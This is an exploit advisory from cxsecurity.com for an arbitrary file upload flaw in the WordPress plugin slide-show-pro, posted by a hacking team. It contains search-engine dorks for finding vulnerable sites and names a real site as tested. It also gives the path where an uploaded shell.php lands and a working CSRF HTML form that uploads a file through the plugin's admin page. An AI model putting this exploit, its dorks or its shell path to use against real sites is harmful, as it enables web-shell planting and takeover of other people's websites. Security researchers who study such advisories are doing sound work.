Wordpress Plugin slideshowpro Arbitrary File Upload

Published
Credit
Risk
2017.01.07
K33P-S1L3NT
High
CWE
CVE
Local
Remote
N/A
N/A
No
Yes
Dork: inurl:/wp-content/plugin/slide-show-pro/ or inurl:plugin/slide-show-pro/ or inurl:/wp-content/uploads/slideshowpro/

// Author : i.am_geek
// Team : K33P-S1L3NT
// Email : k33ps1l3nt@outlook.com
// Notif : Ternate Lab Pentesting
// page : https://www.facebook.com/loading.gov
// Plugin : https://wordpress.org/plugins/slide-show-pro/
// Category : Webapps
// demo : https://www.youtube.com/watch?v=cVAX1To8cag
// Tested : http://www.gotdirtywindows.com.au/
// Dork : inurl:/wp-content/plugin/slide-show-pro/ or inurl:plugin/slide-show-pro/ or inurl:/wp-content/uploads/slideshowpro/
// shell : /wp-content/uploads/slideshowpro/1_uploadfolder/big/shell.php
// Grets : s1puT | geek_Defcon | kazutto_kun | Zbyte | Badaki | 1!0N7!N | QueenAisyha
// Special : Iran-Hack | Turkish-Hack | Overload Team | Ellite Pirates | Tunisia Black Security | Algarian Sec | Indonesia Noobs
// Proof of Concept // Make sure to replace “[path to WordPress]” with the location of WordPress.


// CSRF CODE :


<html>
<body>
<form action="http://[path to WordPress]/wp-admin/admin.php?page=slideshowpro_manage" method="POST" enctype="multipart/form-data">
<input type="hidden" name="task" value="pro_add_new_album" />
<input type="hidden" name="album_name" value="Arbitrary File Upload" />
<input type="hidden" name="album_desc" value="Arbitrary File Upload" />
<input type="file" name="album_img" value="" />
<input type="submit" value="Submit" />
</form>
</body>
</html>


References:

https://www.facebook.com/loading.gov/


See this note in RAW Version

 
Bugtraq RSS
Bugtraq
 
CVE RSS
CVEMAP
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn


Copyright 2017, cxsecurity.com